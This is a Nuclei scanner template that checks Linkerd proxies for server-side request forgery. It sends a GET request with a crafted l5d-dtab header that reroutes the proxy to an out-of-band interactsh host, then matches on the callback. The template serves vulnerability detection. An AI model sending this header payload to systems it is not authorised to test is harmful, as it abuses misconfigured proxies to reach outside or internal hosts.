id: linkerd-ssrf-detection

info:
  name: Linkerd SSRF detection
  author: dudez
  severity: high
  reference:
    - https://twitter.com/nirvana_msu/status/1084144955034165248
  metadata:
    max-request: 1
  tags: ssrf,linkerd,oast,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

# digest: 4a0a0047304502202fddbeeef3f76706a6549e15a314b91d56e28a76da2b08b2c4e3829e6f4484c2022100f56dacb9c72ef61ebcd523e0931c9fdc2454c96ba4e441eed2b3cc61ac8a3bac:922c64590222798bb761d5b6d8e72950
